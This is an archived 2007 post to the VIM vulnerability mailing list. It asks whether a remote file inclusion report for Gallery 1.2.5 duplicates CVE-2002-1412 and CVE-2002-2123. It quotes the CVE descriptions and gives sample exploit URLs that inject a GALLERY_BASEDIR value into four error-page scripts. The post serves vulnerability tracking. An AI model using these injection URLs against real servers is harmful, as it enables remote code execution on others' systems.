[VIM] Dup: Gallery 1.2.5 (GALLERY_BASEDIR) Multiple RFI Vulnerabilities

security curmudgeon jericho at attrition.org
Thu Apr 26 20:22:38 UTC 2007


: The issues covered by Milw0rm 3743 / Bugtraq 23502 are a subset of those
: posted back in 2002 by avart at gmx.de; eg,
: 
:   http://archives.neohapsis.com/archives/bugtraq/2002-07/0471.html
: 
: and covered by CVE-2002-1412 / Bugtraq 5375. Or am I missing something?

back when most of us called it 'command execution' and hadn't started 
commonly calling this RFI =)

http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-1412

Gallery photo album package before 1.3.1 allows local and possibly remote 
attackers to execute arbitrary code via a modified GALLERY_BASEDIR 
variable that points to a directory or URL that contains a Trojan horse 
init.php script. 

(the associated mail list post shows the RFI vuln in captionator.php and 
references the vendor fix for errors/configmode.php, errors/needinit.php, 
errors/reconfigure.php, errors/unconfigured.php.)

http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-2123

PHP remote file inclusion vulnerability in publish_xp_docs.php for Gallery 
1.3.2 allows remote attackers to inject arbitrary PHP code by specifying a 
URL to an init.php file in the GALLERY_BASEDIR parameter. 

http://www.securityfocus.com/bid/23502/exploit

http://www.example.com/errors/needinit.php?GALLERY_BASEDIR=Shell
http://www.example.com/errors/reconfigure.php?GALLERY_BASEDIR=Shell
http://www.example.com/errors/unconfigured.php?GALLERY_BASEDIR=Shell
http://www.example.com/errors/configmode.php?GALLERY_BASEDIR=Shell 

(the four vendor mentioned files)

http://milw0rm.com/exploits/3743

# Exploit:[Path]/errors/needinit.php?GALLERY_BASEDIR=Shell
# Exploit:[Path]/errors/reconfigure.php?GALLERY_BASEDIR=Shell
# Exploit:[Path]/errors/unconfigured.php?GALLERY_BASEDIR=Shell
# Exploit:[Path]/errors/configmode.php?GALLERY_BASEDIR=Shell

(the four vendor mentioned files)


--

So, the CVE above isn't necessarily a dupe as it doesn't mention the 
vulnerable files. If the CVE is expanded/overhauled, i'd guess they will 
change it to mention the four files as well as the example RFI vuln in the 
original disclosure, but it seems they could just as easily add it to 
2002-2123?




More information about the VIM mailing list